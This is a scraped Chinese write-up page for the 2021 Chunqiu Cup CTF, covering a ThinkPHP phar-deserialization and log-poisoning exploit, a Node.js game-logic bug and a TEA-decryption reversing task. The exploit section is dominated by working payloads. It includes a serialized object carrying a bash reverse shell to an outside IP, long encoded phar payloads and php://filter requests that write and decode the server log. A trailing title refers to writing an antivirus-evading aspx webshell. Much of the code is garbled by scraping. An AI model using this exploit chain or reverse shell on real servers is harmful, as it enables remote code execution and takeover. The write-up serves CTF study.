【wp】ctf-2021春秋杯 CTF专场

【wp】ctf-2021春秋杯

ctf-2021春秋杯easy_filter<?phpnamespace think{ abstract class Model{ protected $append = ; private $data = ; function __construct(){ $this->append = ; $this->data = ; } } class Request{ protected $hook = ; protected $filter = "system"; protected $config = ; function __construct(){ $this->filter = "system"; $this->config = ; $this->hook = ; } }}namespace thinkprocesspipes{ use thinkmodelconcernConversion; use thinkmodelPivot; class Windows{ private $files = ; public function __construct(){ $this->files=; } }}namespace thinkmodel{ use thinkModel; class Pivot extends Model{ }}namespace { use thinkprocesspipesWindows; // echo base64_encode(serialize(new Windows())); @unlink("phar.phar"); $phar = new Phar("phar.phar"); //后缀名必须为phar $phar->startBuffering(); $phar->setStub("<?php __HALT_COMPILER(); ?>"); //设置stub $o = new Windows(); $phar->setMetadata($o); //将自定义的meta-data存入manifest $phar->addFromString("test.txt",...
2021年春秋杯春季联赛部分WriteUp CTF专场

2021年春秋杯春季联赛部分WriteUp

Webeasy_filter 跟国赛那个题很像,就是log文件的格式不大一样,改一改就好用的RCEpayload:https://www.freebuf.com/vuls/269882.html生成phar:<?php$a = unserialize(urldecode("O%3A27%3A%22think%5Cprocess%5Cpipes%5CWindows%22%3A1%3A%7Bs%3A34%3A%22%00think%5Cprocess%5Cpipes%5CWindows%00files%22%3Ba%3A1%3A%7Bi%3A0%3BO%3A17%3A%22think%5Cmodel%5CPivot%22%3A4%3A%7Bs%3A17%3A%22%00think%5CModel%00data%22%3Ba%3A1%3A%7Bs%3A6%3A%224ut15m%22%3Bs%3A54%3A%22bash+-c+%27bash+-i+%3E%26+%2Fdev%2Ftcp%2F47.104.134.135%2F2333+0%3E%261%27%22%3B%7Ds%3A21%3A%22%00think%5CModel%00withAttr%22%3Ba%3A1%3A%7Bs%3A6%3A%224ut15m%22%3Bs%3A6%3A%22system%22%3B%7Ds%3A9%3A%22%00%2A%00append%22%3Ba%3A1%3A%7Bs%3A6%3A%224ut15m%22%3Ba%3A0%3A%7B%7D%7Ds%3A8%3A%22relation%22%3Bb%3A0%3B%7D%7D%7D"));$phar = new Phar("phar.phar"); //后缀名必须为phar$phar->startBuffering();$phar->setStub("<?php __HALT_COMPILER(); ?>"); //设置stub$phar->setMetadata($a); //将自定义的meta-data存入manifest$phar->addFromString("test.txt", "test"); //添加要压缩的文件//签名自动计算$phar->stopBuffering();对phar进行编码image-20210529150140989注意这里生成的payload每行结尾有多余的换行符和=,去除一下,然后把+编码成%2bP=00D=009=00w=00a=00H=00A=00g=00X=001=009=00I=00Q=00U=00x=00U=00X=000=00N=00P=00T=00V=00B=00J=00T=00E=00V=00S=00K=00C=00k=007=00I=00D=008=00%2b=00D=00Q=00p=00c=00A=00Q=00A=00A=00A=00Q=00A=00A=00A=00B=00E=00A=00A=00A=00A=00B=00A=00A=00A=00A=00A=00A=00A=00m=00A=00Q=00A=00A=00T=00z=00o=00y=00N=00z=00o=00i=00d=00G=00h=00p=00b=00m=00t=00c=00c=00H=00J=00v=00Y=002=00V=00z=00c=001=00x=00w=00a=00X=00B=00l=00c=001=00x=00X=00a=00W=005=00k=00b=003=00d=00z=00I=00j=00o=00x=00O=00n=00t=00z=00O=00j=00M=000=00O=00i=00I=00A=00d=00G=00h=00p=00b=00m=00t=00c=00c=00H=00J=00v=00Y=002=00V=00z=00c=001=00x=00w=00a=00X=00B=00l=00c=001=00x=00X=00a=00W=005=00k=00b=003=00d=00z=00A=00G=00Z=00p=00b=00G=00V=00z=00I=00j=00t=00h=00O=00j=00E=006=00e=002=00k=006=00M=00D=00t=00P=00O=00j=00E=003=00O=00i=00J=000=00a=00G=00l=00u=00a=001=00x=00t=00b=002=00R=00l=00b=00F=00x=00Q=00a=00X=00Z=00v=00d=00C=00I=006=00N=00D=00p=007=00c=00z=00o=00x=00N=00z=00o=00i=00A=00H=00R=00o=
00a=00W=005=00r=00X=00E=001=00v=00Z=00G=00V=00s=00A=00G=00R=00h=00d=00G=00E=00i=00O=002=00E=006=00M=00T=00p=007=00c=00z=00o=002=00O=00i=00I=000=00d=00X=00Q=00x=00N=00W=000=00i=00O=003=00M=006=00M=00j=00o=00i=00a=00W=00Q=00i=00O=003=001=00z=00O=00j=00I=00x=00O=00i=00I=00A=00d=00G=00h=00p=00b=00m=00t=00c=00T=00W=009=00k=00Z=00W=00w=00A=00d=002=00l=000=00a=00E=00F=000=00d=00H=00I=00i=00O=002=00E=006=00M=00T=00p=007=00c=00z=00o=002=00O=00i=00I=000=00d=00X=00Q=00x=00N=00W=000=00i=00O=003=00M=006=00N=00j=00o=00i=00c=003=00l=00z=00d=00G=00V=00t=00I=00j=00t=009=00c=00z=00o=005=00O=00i=00I=00A=00K=00g=00B=00h=00c=00H=00B=00l=00b=00m=00Q=00i=00O=002=00E=006=00M=00T=00p=007=00c=00z=00o=002=00O=00i=00I=000=00d=00X=00Q=00x=00N=00W=000=00i=00O=002=00E=006=00M=00D=00p=007=00f=00X=001=00z=00O=00j=00g=006=00I=00n=00J=00l=00b=00G=00F=000=00a=00W=009=00u=00I=00j=00t=00i=00O=00j=00A=007=00f=00X=001=009=00C=00A=00A=00A=00A=00H=00R=00l=00c=003=00Q=00u=00d=00H=00h=000=00B=00A=00A=00A=00A=00K=00P=00o=00s=00W=00A=00E=00A=00A=00A=00A=00D=00H=005=00/=002=00L=00Y=00B=00A=00A=00A=00A=00A=00A=00A=00A=00d=00G=00V=00z=00d=00A=00D=00n=00j=00D=00c=00f=00a=00/=00o=00V=00n=00K=00P=00s=00m=00j=00S=00D=00S=00L=00M=00E=00K=00V=00c=00J=00A=00g=00A=00A=00A=00E=00d=00C=00T=00U=00I=00=3D=00thinkphp的日志文件在runtime/log/202105/29.log,下一步就是在本地调试下,尝试如何去掉多余的字符,只将我们的payload解码成phar文件先清空日志:index.php?s=/index/Index/hello&file=php://filter/write=convert.iconv.utf-8.utf-16be|convert.quoted-printable-encode|convert.iconv.utf-16be.utf-8|convert.base64-decode/resource=/var/www/html/runtime/log/202105/29.logimage-20210529151629284为了防止多余的等号影响payload的解析,我们这样传参index.php/index/Index/hello?file=写入我们刚才生成的payloadindex.php/index/Index/hello?file=P=00D=009=00w=00a=00H=00A=00g=00X=001=009=00I=00Q=00U=00x=00U=00X=000=00N=00P=00T=00V=00B=00J=00T=00E=00V=00S=00K=00C=00k=007=00I=00D=008=00%2b=00D=00Q=00p=00c=00A=00Q=00A=00A=00A=00Q=00A=00A=00A=00B=00E=00A=00A=00A=00A=00B=00A=00A=00A=00A=00A=00A=00A=00m=00A=00Q=00A=00A=00T=00z=00o=00y=00N=0
0z=00o=00i=00d=00G=00h=00p=00b=00m=00t=00c=00c=00H=00J=00v=00Y=002=00V=00z=00c=001=00x=00w=00a=00X=00B=00l=00c=001=00x=00X=00a=00W=005=00k=00b=003=00d=00z=00I=00j=00o=00x=00O=00n=00t=00z=00O=00j=00M=000=00O=00i=00I=00A=00d=00G=00h=00p=00b=00m=00t=00c=00c=00H=00J=00v=00Y=002=00V=00z=00c=001=00x=00w=00a=00X=00B=00l=00c=001=00x=00X=00a=00W=005=00k=00b=003=00d=00z=00A=00G=00Z=00p=00b=00G=00V=00z=00I=00j=00t=00h=00O=00j=00E=006=00e=002=00k=006=00M=00D=00t=00P=00O=00j=00E=003=00O=00i=00J=000=00a=00G=00l=00u=00a=001=00x=00t=00b=002=00R=00l=00b=00F=00x=00Q=00a=00X=00Z=00v=00d=00C=00I=006=00N=00D=00p=007=00c=00z=00o=00x=00N=00z=00o=00i=00A=00H=00R=00o=00a=00W=005=00r=00X=00E=001=00v=00Z=00G=00V=00s=00A=00G=00R=00h=00d=00G=00E=00i=00O=002=00E=006=00M=00T=00p=007=00c=00z=00o=002=00O=00i=00I=000=00d=00X=00Q=00x=00N=00W=000=00i=00O=003=00M=006=00M=00j=00o=00i=00a=00W=00Q=00i=00O=003=001=00z=00O=00j=00I=00x=00O=00i=00I=00A=00d=00G=00h=00p=00b=00m=00t=00c=00T=00W=009=00k=00Z=00W=00w=00A=00d=002=00l=000=00a=00E=00F=000=00d=00H=00I=00i=00O=002=00E=006=00M=00T=00p=007=00c=00z=00o=002=00O=00i=00I=000=00d=00X=00Q=00x=00N=00W=000=00i=00O=003=00M=006=00N=00j=00o=00i=00c=003=00l=00z=00d=00G=00V=00t=00I=00j=00t=009=00c=00z=00o=005=00O=00i=00I=00A=00K=00g=00B=00h=00c=00H=00B=00l=00b=00m=00Q=00i=00O=002=00E=006=00M=00T=00p=007=00c=00z=00o=002=00O=00i=00I=000=00d=00X=00Q=00x=00N=00W=000=00i=00O=002=00E=006=00M=00D=00p=007=00f=00X=001=00z=00O=00j=00g=006=00I=00n=00J=00l=00b=00G=00F=000=00a=00W=009=00u=00I=00j=00t=00i=00O=00j=00A=007=00f=00X=001=009=00C=00A=00A=00A=00A=00H=00R=00l=00c=003=00Q=00u=00d=00H=00h=000=00B=00A=00A=00A=00A=00K=00P=00o=00s=00W=00A=00E=00A=00A=00A=00A=00D=00H=005=00/=002=00L=00Y=00B=00A=00A=00A=00A=00A=00A=00A=00A=00d=00G=00V=00z=00d=00A=00D=00n=00j=00D=00c=00f=00a=00/=00o=00V=00n=00K=00P=00s=00m=00j=00S=00D=00S=00L=00M=00E=00K=00V=00c=00J=00A=00g=00A=00A=00A=00E=00d=00C=00T=00U=00I=00=3D=00image-20210529151654248生成了如下格式的日志:-----------------------------------------------
---------------- 127.0.0.1 GET 127.0.0.1/index.php/index/Index/hello?file=P=00D=009=00w=00a=00H=00A=00g=00X=001=009=00I=00Q=00U=00x=00U=00X=000=00N=00P=00T=00V=00B=00J=00T=00E=00V=00S=00K=00C=00k=007=00I=00D=008=00%2b=00D=00Q=00p=00c=00A=00Q=00A=00A=00A=00Q=00A=00A=00A=00B=00E=00A=00A=00A=00A=00B=00A=00A=00A=00A=00A=00A=00A=00m=00A=00Q=00A=00A=00T=00z=00o=00y=00N=00z=00o=00i=00d=00G=00h=00p=00b=00m=00t=00c=00c=00H=00J=00v=00Y=002=00V=00z=00c=001=00x=00w=00a=00X=00B=00l=00c=001=00x=00X=00a=00W=005=00k=00b=003=00d=00z=00I=00j=00o=00x=00O=00n=00t=00z=00O=00j=00M=000=00O=00i=00I=00A=00d=00G=00h=00p=00b=00m=00t=00c=00c=00H=00J=00v=00Y=002=00V=00z=00c=001=00x=00w=00a=00X=00B=00l=00c=001=00x=00X=00a=00W=005=00k=00b=003=00d=00z=00A=00G=00Z=00p=00b=00G=00V=00z=00I=00j=00t=00h=00O=00j=00E=006=00e=002=00k=006=00M=00D=00t=00P=00O=00j=00E=003=00O=00i=00J=000=00a=00G=00l=00u=00a=001=00x=00t=00b=002=00R=00l=00b=00F=00x=00Q=00a=00X=00Z=00v=00d=00C=00I=006=00N=00D=00p=007=00c=00z=00o=00x=00N=00z=00o=00i=00A=00H=00R=00o=00a=00W=005=00r=00X=00E=001=00v=00Z=00G=00V=00s=00A=00G=00R=00h=00d=00G=00E=00i=00O=002=00E=006=00M=00T=00p=007=00c=00z=00o=002=00O=00i=00I=000=00d=00X=00Q=00x=00N=00W=000=00i=00O=003=00M=006=00M=00j=00o=00i=00a=00W=00Q=00i=00O=003=001=00z=00O=00j=00I=00x=00O=00i=00I=00A=00d=00G=00h=00p=00b=00m=00t=00c=00T=00W=009=00k=00Z=00W=00w=00A=00d=002=00l=000=00a=00E=00F=000=00d=00H=00I=00i=00O=002=00E=006=00M=00T=00p=007=00c=00z=00o=002=00O=00i=00I=000=00d=00X=00Q=00x=00N=00W=000=00i=00O=003=00M=006=00N=00j=00o=00i=00c=003=00l=00z=00d=00G=00V=00t=00I=00j=00t=009=00c=00z=00o=005=00O=00i=00I=00A=00K=00g=00B=00h=00c=00H=00B=00l=00b=00m=00Q=00i=00O=002=00E=006=00M=00T=00p=007=00c=00z=00o=002=00O=00i=00I=000=00d=00X=00Q=00x=00N=00W=000=00i=00O=002=00E=006=00M=00D=00p=007=00f=00X=001=00z=00O=00j=00g=006=00I=00n=00J=00l=00b=00G=00F=000=00a=00W=009=00u=00I=00j=00t=00i=00O=00j=00A=007=00f=00X=001=009=00C=00A=00A=00A=00A=00H=00R=00l=00c=003=00Q=00u=00d=00H=00h=000=00B=00A=00A=00A=00A=00
K=00P=00o=00s=00W=00A=00E=00A=00A=00A=00A=00D=00H=005=00/=002=00L=00Y=00B=00A=00A=00A=00A=00A=00A=00A=00A=00d=00G=00V=00z=00d=00A=00D=00n=00j=00D=00c=00f=00a=00/=00o=00V=00n=00K=00P=00s=00m=00j=00S=00D=00S=00L=00M=00E=00K=00V=00c=00J=00A=00g=00A=00A=00A=00E=00d=00C=00T=00U=00I=00=3D=00 file_get_contents(P=00D=009=00w=00a=00H=00A=00g=00X=001=009=00I=00Q=00U=00x=00U=00X=000=00N=00P=00T=00V=00B=00J=00T=00E=00V=00S=00K=00C=00k=007=00I=00D=008=00+=00D=00Q=00p=00c=00A=00Q=00A=00A=00A=00Q=00A=00A=00A=00B=00E=00A=00A=00A=00A=00B=00A=00A=00A=00A=00A=00A=00A=00m=00A=00Q=00A=00A=00T=00z=00o=00y=00N=00z=00o=00i=00d=00G=00h=00p=00b=00m=00t=00c=00c=00H=00J=00v=00Y=002=00V=00z=00c=001=00x=00w=00a=00X=00B=00l=00c=001=00x=00X=00a=00W=005=00k=00b=003=00d=00z=00I=00j=00o=00x=00O=00n=00t=00z=00O=00j=00M=000=00O=00i=00I=00A=00d=00G=00h=00p=00b=00m=00t=00c=00c=00H=00J=00v=00Y=002=00V=00z=00c=001=00x=00w=00a=00X=00B=00l=00c=001=00x=00X=00a=00W=005=00k=00b=003=00d=00z=00A=00G=00Z=00p=00b=00G=00V=00z=00I=00j=00t=00h=00O=00j=00E=006=00e=002=00k=006=00M=00D=00t=00P=00O=00j=00E=003=00O=00i=00J=000=00a=00G=00l=00u=00a=001=00x=00t=00b=002=00R=00l=00b=00F=00x=00Q=00a=00X=00Z=00v=00d=00C=00I=006=00N=00D=00p=007=00c=00z=00o=00x=00N=00z=00o=00i=00A=00H=00R=00o=00a=00W=005=00r=00X=00E=001=00v=00Z=00G=00V=00s=00A=00G=00R=00h=00d=00G=00E=00i=00O=002=00E=006=00M=00T=00p=007=00c=00z=00o=002=00O=00i=00I=000=00d=00X=00Q=00x=00N=00W=000=00i=00O=003=00M=006=00M=00j=00o=00i=00a=00W=00Q=00i=00O=003=001=00z=00O=00j=00I=00x=00O=00i=00I=00A=00d=00G=00h=00p=00b=00m=00t=00c=00T=00W=009=00k=00Z=00W=00w=00A=00d=002=00l=000=00a=00E=00F=000=00d=00H=00I=00i=00O=002=00E=006=00M=00T=00p=007=00c=00z=00o=002=00O=00i=00I=000=00d=00X=00Q=00x=00N=00W=000=00i=00O=003=00M=006=00N=00j=00o=00i=00c=003=00l=00z=00d=00G=00V=00t=00I=00j=00t=009=00c=00z=00o=005=00O=00i=00I=00A=00K=00g=00B=00h=00c=00H=00B=00l=00b=00m=00Q=00i=00O=002=00E=006=00M=00T=00p=007=00c=00z=00o=002=00O=00i=00I=000=00d=00X=00Q=00x=00N=00W=000=00i=00O=002=00E=006=0
0M=00D=00p=007=00f=00X=001=00z=00O=00j=00g=006=00I=00n=00J=00l=00b=00G=00F=000=00a=00W=009=00u=00I=00j=00t=00i=00O=00j=00A=007=00f=00X=001=009=00C=00A=00A=00A=00A=00H=00R=00l=00c=003=00Q=00u=00d=00H=00h=000=00B=00A=00A=00A=00A=00K=00P=00o=00s=00W=00A=00E=00A=00A=00A=00A=00D=00H=005=00/=002=00L=00Y=00B=00A=00A=00A=00A=00A=00A=00A=00A=00d=00G=00V=00z=00d=00A=00D=00n=00j=00D=00c=00f=00a=00/=00o=00V=00n=00K=00P=00s=00m=00j=00S=00D=00S=00L=00M=00E=00K=00V=00c=00J=00A=00g=00A=00A=00A=00E=00d=00C=00T=00U=00I=00=3D=00): failed to open stream: File name too long经过尝试,将payload修改成如下格式即可正常解码:payload开头加入俩数字来使得前面的=正常解码,结尾加上a使得最终只出现一个payload50P=00D=009=00w=00a=00H=00A=00g=00X=001=009=00I=00Q=00U=00x=00U=00X=000=00N=00P=00T=00V=00B=00J=00T=00E=00V=00S=00K=00C=00k=007=00I=00D=008=00%2b=00D=00Q=00p=00c=00A=00Q=00A=00A=00A=00Q=00A=00A=00A=00B=00E=00A=00A=00A=00A=00B=00A=00A=00A=00A=00A=00A=00A=00m=00A=00Q=00A=00A=00T=00z=00o=00y=00N=00z=00o=00i=00d=00G=00h=00p=00b=00m=00t=00c=00c=00H=00J=00v=00Y=002=00V=00z=00c=001=00x=00w=00a=00X=00B=00l=00c=001=00x=00X=00a=00W=005=00k=00b=003=00d=00z=00I=00j=00o=00x=00O=00n=00t=00z=00O=00j=00M=000=00O=00i=00I=00A=00d=00G=00h=00p=00b=00m=00t=00c=00c=00H=00J=00v=00Y=002=00V=00z=00c=001=00x=00w=00a=00X=00B=00l=00c=001=00x=00X=00a=00W=005=00k=00b=003=00d=00z=00A=00G=00Z=00p=00b=00G=00V=00z=00I=00j=00t=00h=00O=00j=00E=006=00e=002=00k=006=00M=00D=00t=00P=00O=00j=00E=003=00O=00i=00J=000=00a=00G=00l=00u=00a=001=00x=00t=00b=002=00R=00l=00b=00F=00x=00Q=00a=00X=00Z=00v=00d=00C=00I=006=00N=00D=00p=007=00c=00z=00o=00x=00N=00z=00o=00i=00A=00H=00R=00o=00a=00W=005=00r=00X=00E=001=00v=00Z=00G=00V=00s=00A=00G=00R=00h=00d=00G=00E=00i=00O=002=00E=006=00M=00T=00p=007=00c=00z=00o=002=00O=00i=00I=000=00d=00X=00Q=00x=00N=00W=000=00i=00O=003=00M=006=00M=00j=00o=00i=00a=00W=00Q=00i=00O=003=001=00z=00O=00j=00I=00x=00O=00i=00I=00A=00d=00G=00h=00p=00b=00m=00t=00c=00T=00W=009=00k=00Z=00W=00w=00A=00d=002=00l=000=00a=00E=00F=000=00d=00H=00I=00i=00O=002=00E=006=00M=00T=00p=007=00c=0
0z=00o=002=00O=00i=00I=000=00d=00X=00Q=00x=00N=00W=000=00i=00O=003=00M=006=00N=00j=00o=00i=00c=003=00l=00z=00d=00G=00V=00t=00I=00j=00t=009=00c=00z=00o=005=00O=00i=00I=00A=00K=00g=00B=00h=00c=00H=00B=00l=00b=00m=00Q=00i=00O=002=00E=006=00M=00T=00p=007=00c=00z=00o=002=00O=00i=00I=000=00d=00X=00Q=00x=00N=00W=000=00i=00O=002=00E=006=00M=00D=00p=007=00f=00X=001=00z=00O=00j=00g=006=00I=00n=00J=00l=00b=00G=00F=000=00a=00W=009=00u=00I=00j=00t=00i=00O=00j=00A=007=00f=00X=001=009=00C=00A=00A=00A=00A=00H=00R=00l=00c=003=00Q=00u=00d=00H=00h=000=00B=00A=00A=00A=00A=00P=00n=00U=00s=00W=00A=00E=00A=00A=00A=00A=00D=00H=005=00/=002=00L=00Y=00B=00A=00A=00A=00A=00A=00A=00A=00A=00d=00G=00V=00z=00d=00C=00X=00V=00Z=00K=00W=00D=00l=00R=00w=00s=00R=00A=00g=003=00p=001=001=008=00O=00N=00k=002=00U=00P=00O=00w=00A=00g=00A=00A=00A=00E=00d=00C=00T=00U=00I=00=3D=00a再清空,发送payloadimage-20210529151459137image-20210529152400240解码index.php?s=/index/Index/hello&file=php://filter/write=convert.quoted-printable-decode|convert.iconv.utf-16le.utf-8|convert.base64-decode/resource=/var/www/html/runtime/log/202105/29.logimage-20210529152434435触发image-20210529152509697成功执行,接下来就把命令改成tac 
/flag就好了http://eci-2zegz186wmvgj36lmnge.cloudeci1.ichunqiu.com/index.php/index/Index/hello?file=50P=00D=009=00w=00a=00H=00A=00g=00X=001=009=00I=00Q=00U=00x=00U=00X=000=00N=00P=00T=00V=00B=00J=00T=00E=00V=00S=00K=00C=00k=007=00I=00D=008=00%2b=00D=00Q=00p=00j=00A=00Q=00A=00A=00A=00Q=00A=00A=00A=00B=00E=00A=00A=00A=00A=00B=00A=00A=00A=00A=00A=00A=00A=00t=00A=00Q=00A=00A=00T=00z=00o=00y=00N=00z=00o=00i=00d=00G=00h=00p=00b=00m=00t=00c=00c=00H=00J=00v=00Y=002=00V=00z=00c=001=00x=00w=00a=00X=00B=00l=00c=001=00x=00X=00a=00W=005=00k=00b=003=00d=00z=00I=00j=00o=00x=00O=00n=00t=00z=00O=00j=00M=000=00O=00i=00I=00A=00d=00G=00h=00p=00b=00m=00t=00c=00c=00H=00J=00v=00Y=002=00V=00z=00c=001=00x=00w=00a=00X=00B=00l=00c=001=00x=00X=00a=00W=005=00k=00b=003=00d=00z=00A=00G=00Z=00p=00b=00G=00V=00z=00I=00j=00t=00h=00O=00j=00E=006=00e=002=00k=006=00M=00D=00t=00P=00O=00j=00E=003=00O=00i=00J=000=00a=00G=00l=00u=00a=001=00x=00t=00b=002=00R=00l=00b=00F=00x=00Q=00a=00X=00Z=00v=00d=00C=00I=006=00N=00D=00p=007=00c=00z=00o=00x=00N=00z=00o=00i=00A=00H=00R=00o=00a=00W=005=00r=00X=00E=001=00v=00Z=00G=00V=00s=00A=00G=00R=00h=00d=00G=00E=00i=00O=002=00E=006=00M=00T=00p=007=00c=00z=00o=002=00O=00i=00I=000=00d=00X=00Q=00x=00N=00W=000=00i=00O=003=00M=006=00O=00T=00o=00i=00d=00G=00F=00j=00I=00C=009=00m=00b=00G=00F=00n=00I=00j=00t=009=00c=00z=00o=00y=00M=00T=00o=00i=00A=00H=00R=00o=00a=00W=005=00r=00X=00E=001=00v=00Z=00G=00V=00s=00A=00H=00d=00p=00d=00G=00h=00B=00d=00H=00R=00y=00I=00j=00t=00h=00O=00j=00E=006=00e=003=00M=006=00N=00j=00o=00i=00N=00H=00V=000=00M=00T=00V=00t=00I=00j=00t=00z=00O=00j=00Y=006=00I=00n=00N=005=00c=003=00R=00l=00b=00S=00I=007=00f=00X=00M=006=00O=00T=00o=00i=00A=00C=00o=00A=00Y=00X=00B=00w=00Z=00W=005=00k=00I=00j=00t=00h=00O=00j=00E=006=00e=003=00M=006=00N=00j=00o=00i=00N=00H=00V=000=00M=00T=00V=00t=00I=00j=00t=00h=00O=00j=00A=006=00e=003=001=009=00c=00z=00o=004=00O=00i=00J=00y=00Z=00W=00x=00h=00d=00G=00l=00v=00b=00i=00I=007=00Y=00j=00o=00w=00O=003=001=009=00f=00Q=00g=00A=00A=00A=00B=00
0=00Z=00X=00N=000=00L=00n=00R=004=00d=00A=00Q=00A=00A=00A=00B=009=007=00L=00F=00g=00B=00A=00A=00A=00A=00A=00x=00%2b=00f=009=00i=002=00A=00Q=00A=00A=00A=00A=00A=00A=00A=00H=00R=00l=00c=003=00Q=00p=006=00T=00n=00c=00B=00R=00c=007=00o=00Z=00V=00i=00m=00m=005=00n=00c=00l=00W=00t=00J=00y=00W=00w=007=00Q=00I=00A=00A=00A=00B=00H=00Q=00k=001=00C=00aimage-20210529153357667也可以弹shellimage-20210529175348399ctftaker /source有源码import { createHash } from "crypto";import { readFileSync } from "fs";import { resolve } from "path";import {exit} from "process";import cookieSession  from "cookie-session";import express from "express";import { SessionData } from "express-session";import * as CONST from "./const";declare module "express-session" {  interface SessionData {    history: string;    monster: SerializedObj;    player: SerializedObj;    coin: number;    init: boolean;  }}interface SerializedObj {  ATK: number;  DEF: number;  HP: number;  factor: number;  name: string;}class Obj {  ATK: number;  DEF: number;  HP: number;  factor: number;  constructor(readonly name: string, factor: number|string, ATK?: number, DEF?: number, HP?: number) {    this.factor = factor = parseInt(`${factor}`);    this.ATK = ATK ?? factor * Math.random();    this.DEF = DEF ?? factor * Math.random();    this.HP = HP ?? 
factor * Math.random();  }  levepup(factor: number|string) {    this.factor = factor = this.factor + parseInt(`${factor}`);    this.ATK = factor * Math.random();    this.DEF = factor * Math.random();    this.HP = factor * Math.random();  }  fight(obj: Obj):  {    const his: string = ;    let selfHp = this.HP;    let objHp = obj.HP;    his.push(`${this.name} HP:${selfHp};${obj.name} HP:${objHp}`);    while(true) {      objHp -= this.ATK - obj.DEF;      objHp = Math.max(objHp, 0);      his.push(`${this.name}向${obj.name}发起攻击!`);      his.push(`${this.name} HP:${selfHp};${obj.name} HP:${objHp}`);      if(objHp === 0) break;      selfHp -= obj.ATK - this.DEF;      selfHp = Math.max(selfHp, 0);      his.push(`${obj.name}向${this.name}发起攻击!`);      his.push(`${this.name} HP:${selfHp};${obj.name} HP:${objHp}`);      if(selfHp === 0) break;    }    return ;  }  static serialize(obj: Obj): SerializedObj {    return {      ATK: obj.ATK,      DEF: obj.DEF,      HP: obj.HP,      factor: obj.factor,      name: obj.name,    };  }  static deserialzie(obj: SerializedObj): Obj {    return new Obj(obj.name, obj.factor, obj.ATK, obj.DEF, obj.HP);  }}const app = express();app.use(express.static(resolve("static")));app.use(express.json());app.use(express.urlencoded({extended: true}));const secret = createHash("md5").update(`${Math.random()}`).digest("hex");app.use(cookieSession({  secret: secret,  name: "session",}));console.log(secret);function initSession(session: any): session is SessionData {  if(!session.init) {    session.history = ;    session.player = new Obj("Player", 0);    session.coin = 1;    session.init = true;    session.monster = ;  }  return true;}app.use((req, res, next) => {  initSession(req.session);  next();});app.get("/his", (req, res) => {  if(!initSession(req.session)) return;  res.send({    message: req.session.history.join("n"),  });});app.get("/start", (req, res) => {  if(!initSession(req.session)) return;  req.session.history = 
req.session.history.concat(CONST.banner);  res.send({    message: CONST.banner.join("n"),  });});app.post("/levelup", (req, res) => {  if(!initSession(req.session)) return;  const {f} = req.body;  if(!f || f > req.session.coin) {    return res.send({message: "不大对呢"});  }  req.session.coin -= f;  const player = Obj.deserialzie(req.session.player);  if(player.factor > 50) {    return res.send({message: "你太强了,寻找更多的机遇吧"});  }  player.levepup(f);  req.session.player = Obj.serialize(player);  const msg = `${player.name}使用了${f}枚硬币升级了自己  现在的状态:ATK:${player.ATK},DEF:${player.DEF},HP:${player.HP},COIN:${req.session.coin}枚,还剩${req.session.monster.length}个题`.split("n");  req.session.history = req.session.history.concat(msg);  res.send({message: msg.join("n")});});app.get("/monster", (req, res) => {  if(!initSession(req.session)) return;  if(req.session.monster.length===0) {    return res.send({message: CONST.footer.join("n")});  }  const monster = Obj.deserialzie(req.session.monster);  res.send({    message: `${monster.name}出现了!ATK:${monster.ATK},DEF:${monster.DEF},HP:${monster.HP}`,  });});app.get("/status", (req, res) => {  if(!initSession(req.session)) return;  const player = Obj.deserialzie(req.session.player);  res.send({message: `${player.name}现在的状态:ATK:${player.ATK},DEF:${player.DEF},HP:${player.HP},COIN:${req.session.coin}枚,还剩${req.session.monster.length}个题`});});app.get("/fight", (req, res) => {  if(!initSession(req.session)) return;  if(req.session.monster.length===0) {    return res.send({message: CONST.footer.join("n")});  }  const player = Obj.deserialzie(req.session.player);  const monster = Obj.deserialzie(req.session.monster);  const  = player.fight(monster);  if(win) {    req.session.monster = req.session.monster.slice(1);    his.push("你赢了耶!");  } else {    his.push("你输了,刷新以重新开始");    req.session.init = false;  }  req.session.history = req.session.history.concat(his);  res.send({message: his.join("n")});});app.get("/source", (req, res) => {  
res.send(readFileSync("./src/main.ts"));});app.get("/exit", (req, res) => {  exit(0);});app.use((err: any, req: any, res: any) => {  console.error(err.stack);  res.status(500).send("Something broke!");});app.listen(80);重要的地方在这里image-20210529161549436image-20210529161603354传入9999999/0,即可把自己的倍数增加到9999999,然后序列化保存image-20210529161816131下次反序列化player的时候,player的属性就会超级加倍image-20210529161823449一开始是个弱鸡image-20210529161921628属性加倍image-20210529161943872打出flagimage-20210529162001119Reversebackdoor 首先程序会net listen监听端口image-20210529171048979输入g01angBackd00r会执行 mai n_Decrypt函数image-20210529171102262image-20210529171135816chal 直接打开文件image-20210529171318392根据敏感变量名猜测是tea家族算法提取出数据33208527578,4235851793.0699878777,16770980233.41664154466,34643198083.83532878313,29223160963.122276156225,339876773.163775107838,3138262082key 3735928559,3405691582,269488144,16843009exp#include <stdio.h>#include <stdint.h> //加密函数void encrypt (uint32_t* v, uint32_t* k) {    uint32_t v0=v, v1=v, sum=0, i;           /* set up */    uint32_t delta=0x9e3779b9;                     /* a key schedule constant */    uint32_t k0=k, k1=k, k2=k, k3=k;   /* cache key */    for (i=0; i < 32; i++) {                       /* basic cycle start */        sum += delta;        v0 += ((v1<<4) + k0) ^ (v1 + sum) ^ ((v1>>5) + k1);        v1 += ((v0<<4) + k2) ^ (v0 + sum) ^ ((v0>>5) + k3);    }                                              /* end cycle */    v=v0; v=v1;}//解密函数void decrypt (uint32_t* v, uint32_t* k) {    uint32_t v0=v, v1=v, sum=0xC6EF3720, i;  /* set up */    uint32_t delta=0x9e3779b9;                     /* a key schedule constant */    uint32_t k0=k, k1=k, k2=k, k3=k;   /* cache key */    for (i=0; i<32; i++) {                         /* basic cycle start */        v1 -= ((v0<<4) + k2) ^ (v0 + sum) ^ ((v0>>5) + k3);        v0 -= ((v1<<4) + k0) ^ (v1 + sum) ^ ((v1>>5) + k1);        sum -= delta;    }                                              /* end cycle */    v=v0; v=v1;} int main(){    uint32_t 
v={3775107838,3138262082},k={3735928559,3405691582,269488144,16843009};    // v为要加密的数据是两个32位无符号整数    // k为加密解密密钥,为4个32位无符号整数,即密钥长度为128位    decrypt(v, k);    printf(",%u,%un",v,v);    return 0;}image-20210529171403840 本文始发于微信公众号(山警网络空间安全与电子数据取证):2021年春秋杯春季联赛部分WriteUp
如何自己写aspx过狗D盾一句话木马 moonsec_com

如何自己写aspx过狗D盾一句话木马

